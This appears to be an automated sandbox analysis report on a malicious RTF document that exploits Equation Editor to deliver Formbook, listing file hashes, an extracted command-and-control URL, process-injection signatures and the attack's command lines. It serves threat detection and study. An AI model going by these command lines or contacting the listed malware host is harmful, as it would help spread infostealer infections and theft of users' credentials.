Analysis
- max time kernel: 147s
- max time network: 24s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 21-01-2021 07:18
Static task: static1
Behavioral task: behavioral1
- Sample: Inquiry No TBD-6-5659.doc.rtf
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: Inquiry No TBD-6-5659.doc.rtf
- Resource: win10v20201028
General
- Target: Inquiry No TBD-6-5659.doc.rtf
- Size: 2.1MB
- MD5: 1487709f7e0bd31d246132df9e334e9c
- SHA1: 6f4250f4ffa15136852127b7d9dbfeabdd85d020
- SHA256: 49615f1281e974a6f58c4dea63673b24ae8b331a3801788244710a3a19194a7a
- SHA512: aca6e69fe09e1c8446ffee3047fa3cefc3028ff203edf4d3b964f46b538cf83af5373e0a9e971b010ac568ebddb96e27769f927a0304e5e3d27e930a091fe462
Malware Config
Extracted
formbook
http://www.raleighblacknursesrock.com/sly/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 912 | 1196 | Powershell.exe |
-
Formbook Payload 3 IoCs
Processes:
resource | yara_rule
behavioral1/memory/1700-25-0x000000000041EBA0-mapping.dmp | formbook
behavioral1/memory/1700-24-0x0000000000400000-0x000000000042E000-memory.dmp | formbook
behavioral1/memory/1904-35-0x00000000000D0000-0x00000000000FE000-memory.dmp | formbook
-
Blocklisted process makes network request 1 IoCs
Processes:
Powershell.exe
flow | pid | process
6 | 912 | Powershell.exe
-
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | Powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetThreadContext 4 IoCs
Processes:
Powershell.exe, calc.exe, cscript.exe
description | pid | process | target process
PID 912 set thread context of 1700 | 912 | Powershell.exe | calc.exe
PID 1700 set thread context of 1272 | 1700 | calc.exe | Explorer.EXE
PID 1700 set thread context of 1272 | 1700 | calc.exe | Explorer.EXE
PID 1904 set thread context of 1272 | 1904 | cscript.exe | Explorer.EXE
-
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXE
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXE
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXE
pid | process
1656 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
Powershell.execalc.execscript.exepid process 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 1700 calc.exe 1700 calc.exe 1700 calc.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
calc.exe, cscript.exe
pid | process
1700 | calc.exe
1700 | calc.exe
1700 | calc.exe
1700 | calc.exe
1904 | cscript.exe
1904 | cscript.exe
-
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.exe, calc.exe, cscript.exe
description | pid | process
Token: SeDebugPrivilege | 912 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 912 | Powershell.exe
Token: SeSecurityPrivilege | 912 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 912 | Powershell.exe
Token: SeLoadDriverPrivilege | 912 | Powershell.exe
Token: SeSystemProfilePrivilege | 912 | Powershell.exe
Token: SeSystemtimePrivilege | 912 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 912 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 912 | Powershell.exe
Token: SeCreatePagefilePrivilege | 912 | Powershell.exe
Token: SeBackupPrivilege | 912 | Powershell.exe
Token: SeRestorePrivilege | 912 | Powershell.exe
Token: SeShutdownPrivilege | 912 | Powershell.exe
Token: SeDebugPrivilege | 912 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 912 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 912 | Powershell.exe
Token: SeUndockPrivilege | 912 | Powershell.exe
Token: SeManageVolumePrivilege | 912 | Powershell.exe
Token: 33 | 912 | Powershell.exe
Token: 34 | 912 | Powershell.exe
Token: 35 | 912 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 912 | Powershell.exe
Token: SeSecurityPrivilege | 912 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 912 | Powershell.exe
Token: SeLoadDriverPrivilege | 912 | Powershell.exe
Token: SeSystemProfilePrivilege | 912 | Powershell.exe
Token: SeSystemtimePrivilege | 912 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 912 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 912 | Powershell.exe
Token: SeCreatePagefilePrivilege | 912 | Powershell.exe
Token: SeBackupPrivilege | 912 | Powershell.exe
Token: SeRestorePrivilege | 912 | Powershell.exe
Token: SeShutdownPrivilege | 912 | Powershell.exe
Token: SeDebugPrivilege | 912 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 912 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 912 | Powershell.exe
Token: SeUndockPrivilege | 912 | Powershell.exe
Token: SeManageVolumePrivilege | 912 | Powershell.exe
Token: 33 | 912 | Powershell.exe
Token: 34 | 912 | Powershell.exe
Token: 35 | 912 | Powershell.exe
Token: SeDebugPrivilege | 1700 | calc.exe
Token: SeDebugPrivilege | 1904 | cscript.exe
-
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXE
pid | process
1272 | Explorer.EXE
1272 | Explorer.EXE
1272 | Explorer.EXE
1272 | Explorer.EXE
-
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXE
pid | process
1272 | Explorer.EXE
1272 | Explorer.EXE
1272 | Explorer.EXE
1272 | Explorer.EXE
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXE
pid | process
1656 | WINWORD.EXE
1656 | WINWORD.EXE
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXE, CmD.exe, Powershell.exe, Explorer.EXE, cscript.exe
description | pid | process | target process
PID 268 wrote to memory of 1744 | 268 | EQNEDT32.EXE | CmD.exe
PID 268 wrote to memory of 1744 | 268 | EQNEDT32.EXE | CmD.exe
PID 268 wrote to memory of 1744 | 268 | EQNEDT32.EXE | CmD.exe
PID 268 wrote to memory of 1744 | 268 | EQNEDT32.EXE | CmD.exe
PID 1744 wrote to memory of 1440 | 1744 | CmD.exe | cscript.exe
PID 1744 wrote to memory of 1440 | 1744 | CmD.exe | cscript.exe
PID 1744 wrote to memory of 1440 | 1744 | CmD.exe | cscript.exe
PID 1744 wrote to memory of 1440 | 1744 | CmD.exe | cscript.exe
PID 912 wrote to memory of 1700 | 912 | Powershell.exe | calc.exe
PID 912 wrote to memory of 1700 | 912 | Powershell.exe | calc.exe
PID 912 wrote to memory of 1700 | 912 | Powershell.exe | calc.exe
PID 912 wrote to memory of 1700 | 912 | Powershell.exe | calc.exe
PID 912 wrote to memory of 1700 | 912 | Powershell.exe | calc.exe
PID 912 wrote to memory of 1700 | 912 | Powershell.exe | calc.exe
PID 912 wrote to memory of 1700 | 912 | Powershell.exe | calc.exe
PID 1272 wrote to memory of 1904 | 1272 | Explorer.EXE | cscript.exe
PID 1272 wrote to memory of 1904 | 1272 | Explorer.EXE | cscript.exe
PID 1272 wrote to memory of 1904 | 1272 | Explorer.EXE | cscript.exe
PID 1272 wrote to memory of 1904 | 1272 | Explorer.EXE | cscript.exe
PID 1904 wrote to memory of 744 | 1904 | cscript.exe | cmd.exe
PID 1904 wrote to memory of 744 | 1904 | cscript.exe | cmd.exe
PID 1904 wrote to memory of 744 | 1904 | cscript.exe | cmd.exe
PID 1904 wrote to memory of 744 | 1904 | cscript.exe | cmd.exe
Processes
-
C:\Windows\Explorer.EXE (tree depth 1)
Command line: C:\Windows\Explorer.EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (tree depth 2)
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Inquiry No TBD-6-5659.doc.rtf"
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cscript.exe (tree depth 2)
Command line: "C:\Windows\SysWOW64\cscript.exe"
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (tree depth 3)
Command line: /c del "C:\WINDOWS\syswow64\calc.exe"
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (tree depth 1)
Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exe (tree depth 2)
Command line: CmD.exe /C cscript %tmp%\Client.vbs AC
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.exe (tree depth 3)
Command line: cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe (tree depth 1)
Command line: Powershell <obfuscated inline script>
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe (tree depth 2)
Command line: "{path}"
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbs
MD5: 20ed438b3c329a1d4807899fe1a87170
SHA1: 3861443af59f5f85032719c35962e5194bebb746
SHA256: 2e881a5bd280fcbd0fb76ba305602ff7d16c730b39713060932583946f3dedab
SHA512: f3e28c4844e101946057567f4f35875fc7d8e5022c0a435c797dcd6d558290cb6b3fbe4b412638402f0714927508f1ce2c9b999cd2d4783244efedcb5470e539